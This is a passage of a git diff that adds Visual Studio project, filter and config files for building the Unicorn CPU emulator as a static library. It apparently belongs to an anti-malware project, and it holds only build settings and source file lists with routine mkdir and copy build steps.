"$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).lib" "$(SolutionDir)distro\$(Platform)\" + +copy "$(SolutionDir)..\include\unicorn\*.h" "$(SolutionDir)distro\include\unicorn\" +</Command> + </PostBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + 
<WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;__x86_64__;UNICORN_HAS_ARM;UNICORN_HAS_ARM64;UNICORN_HAS_M68K;UNICORN_HAS_MIPS;UNICORN_HAS_MIPS64;UNICORN_HAS_MIPSEL;UNICORN_HAS_MIPS64EL;UNICORN_HAS_SPARC;UNICORN_HAS_X86;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <AdditionalIncludeDirectories>.;..;../../../include;../../../qemu;../../../qemu/include;../../../qemu/tcg</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <ExceptionHandling>false</ExceptionHandling> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <Lib> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>aarch64-softmmu.lib;aarch64eb-softmmu.lib;arm-softmmu.lib;armeb-softmmu.lib;m68k-softmmu.lib;mips-softmmu.lib;mips64-softmmu.lib;mipsel-softmmu.lib;mips64el-softmmu.lib;sparc-softmmu.lib;sparc64-softmmu.lib;x86_64-softmmu.lib</AdditionalDependencies> + </Lib> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + <PostBuildEvent> + <Command>mkdir "$(SolutionDir)distro\" +mkdir "$(SolutionDir)distro\include" +mkdir "$(SolutionDir)distro\include\unicorn" +mkdir "$(SolutionDir)distro\$(Platform)" + +copy "$(SolutionDir)$(Platform)\$(Configuration)\$(ProjectName).lib" "$(SolutionDir)distro\$(Platform)\" + +copy "$(SolutionDir)..\include\unicorn\*.h" 
"$(SolutionDir)distro\include\unicorn\" +</Command> + </PostBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj.filters new file mode 100644 index 0000000..121c3ee --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj.filters @@ -0,0 +1,504 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="qemu"> + <UniqueIdentifier>{13755027-3a13-46c3-9468-ed380fcef603}</UniqueIdentifier> + </Filter> + <Filter Include="priv"> + <UniqueIdentifier>{4f904f9f-fd99-4ebe-8db7-2ee2c644c6e4}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\util"> + <UniqueIdentifier>{1f3288bd-38e9-49c1-ae30-6ac4bc1b86c4}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\hw"> + <UniqueIdentifier>{d98a987f-6e81-4454-9bb4-f79d49d1d8fa}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qapi"> + <UniqueIdentifier>{9b261303-0cae-4e60-8bc9-c63cd6abd5bc}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qobject"> + <UniqueIdentifier>{4078dd72-489d-48e6-a7c7-e27149f9513d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qom"> + <UniqueIdentifier>{9264dcdf-55d8-4416-9b53-7962937b4db5}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\hw\core"> + <UniqueIdentifier>{973f87b6-2729-473f-bda6-d61d8c799a77}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include"> + <UniqueIdentifier>{235236d2-79fa-48f5-b496-cb79a9290f6b}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\exec"> + 
<UniqueIdentifier>{4bb86c12-fd75-40be-9891-e4a84ca60703}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\fpu"> + <UniqueIdentifier>{b210c6e7-454a-400c-84c4-d2a10d96db1d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw"> + <UniqueIdentifier>{8bdec3ae-c802-4443-a6f4-e26bd030a1cf}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\arm"> + <UniqueIdentifier>{e7cfa963-4fb5-4c9a-a264-402decbea01d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\cpu"> + <UniqueIdentifier>{1890ac05-1098-492d-bc0d-50b6e8dd7fc0}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\i386"> + <UniqueIdentifier>{76e19a4b-1143-456a-900c-9ce6c9c0d267}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\m68k"> + <UniqueIdentifier>{0e879645-49d7-4d24-9736-f85d69acceda}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\mips"> + <UniqueIdentifier>{9ecedd1d-44a7-40d1-ad99-f06e49b39aa8}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\sparc"> + <UniqueIdentifier>{50ff932c-1464-4742-af74-fc9b42e4ef3a}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qapi"> + <UniqueIdentifier>{ea61989d-dc0a-4146-87a0-63e5131d5302}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qapi\qmp"> + <UniqueIdentifier>{044502cd-501d-40eb-86d0-4c8db24104c7}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qemu"> + <UniqueIdentifier>{b1debb6d-f445-4f95-9778-d6b926541606}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qom"> + <UniqueIdentifier>{c5faa816-aae6-41b7-ac8d-40a9783786e0}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\sysemu"> + <UniqueIdentifier>{62c5db3f-0d6d-4a3a-92b7-0cd602058a62}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\list.c"> + <Filter>priv</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\accel.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile 
Include="..\..\..\qemu\glib_compat.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qemu-log.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qemu-timer.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg-runtime.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\vl.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\core\machine.c"> + <Filter>qemu\hw\core</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\core\qdev.c"> + <Filter>qemu\hw\core</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qapi-dealloc-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qapi-visit-core.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qmp-input-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qmp-output-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\string-input-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qbool.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qdict.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qerror.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qfloat.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qint.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qlist.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qstring.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\container.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile 
Include="..\..\..\qemu\qom\cpu.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\object.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\qom-qobject.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\aes.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\bitmap.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\bitops.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\crc32c.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\cutils.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\error.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\getauxval.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\host-utils.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\module.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\oslib-win32.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-error.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-thread-win32.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-timer-common.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\uc.c" /> + <ClCompile Include="..\qapi-visit.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\qapi-types.c"> + <Filter>qemu</Filter> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\include\list.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\qemu.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\include\uc_priv.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\vl.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\config.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\elf.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\glib_compat.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu-common.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\address-spaces.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-all.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-common.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-defs.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst_template.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cputlb.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\exec-all.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\gen-icount.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-gen.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-head.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-proto.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\qemu\include\exec\helper-tcg.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\hwaddr.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\ioport.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\memory-internal.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\memory.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\poison.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\ram_addr.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\softmmu-semi.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\spinlock.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\fpu\softfloat.h"> + <Filter>qemu\include\fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\boards.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\hw.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\irq.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\qdev-core.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\qdev.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\arm\arm.h"> + <Filter>qemu\include\hw\arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\cpu\icc_bus.h"> + <Filter>qemu\include\hw\cpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic.h"> + <Filter>qemu\include\hw\i386</Filter> + 
</ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic_internal.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\pc.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\m68k.h"> + <Filter>qemu\include\hw\m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\mcf.h"> + <Filter>qemu\include\hw\m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\bios.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\cpudevs.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\mips.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\grlib.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc32_dma.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sun4m.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\dealloc-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\error.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\opts-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-input-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-output-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\string-input-visitor.h"> + 
<Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor-impl.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qbool.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qdict.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qerror.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qfloat.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qint.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qjson.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qlist.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qobject.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qstring.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\types.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\aes.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\atomic.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bitmap.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bitops.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bswap.h"> + 
<Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\compiler.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\crc32c.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\host-utils.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\int128.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\log.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\module.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\notify.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\osdep.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\queue.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\range.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-posix.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-win32.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\timer.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\typedefs.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\cpu.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\object.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude 
Include="..\..\..\qemu\include\qom\qom-qobject.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\accel.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\cpus.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\memory_mapping.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\os-win32.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\sysemu.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\unicorn\arm.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm64.h" /> + <ClInclude Include="..\..\..\include\unicorn\m68k.h" /> + <ClInclude Include="..\..\..\include\unicorn\mips.h" /> + <ClInclude Include="..\..\..\include\unicorn\sparc.h" /> + <ClInclude Include="..\..\..\include\unicorn\unicorn.h" /> + <ClInclude Include="..\..\..\include\unicorn\x86.h" /> + <ClInclude Include="..\..\..\include\unicorn\platform.h" /> + <ClInclude Include="..\config-host.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\qapi-visit.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\qapi-types.h"> + <Filter>qemu</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <MASM Include="..\..\..\qemu\util\setjmp-wrapper-win32.asm" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/config-target.h new file mode 100644 index 0000000..3edfc5d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/config-target.h @@ -0,0 +1,5 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_X86_64 1 +#define 
TARGET_NAME "x86_64" +#define TARGET_I386 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj new file mode 100644 index 0000000..b8c471e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/x86_64-softmmu/x86_64-softmmu.vcxproj @@ -0,0 +1,243 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\cc_helper_template.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\ops_sse.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\ops_sse_header.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\shift_helper_template.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\svm.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\topology.h" /> + <ClInclude Include="..\..\..\qemu\target-i386\unicorn.h" 
/> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\x86_64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\i386\pc.c" /> + <ClCompile Include="..\..\..\qemu\hw\i386\pc_piix.c" /> + <ClCompile Include="..\..\..\qemu\hw\intc\apic.c" /> + <ClCompile Include="..\..\..\qemu\hw\intc\apic_common.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\arch_memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\cc_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\excp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\fpu_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\int_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\mem_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\misc_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\seg_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\smm_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-i386\svm_helper.c" /> + <ClCompile 
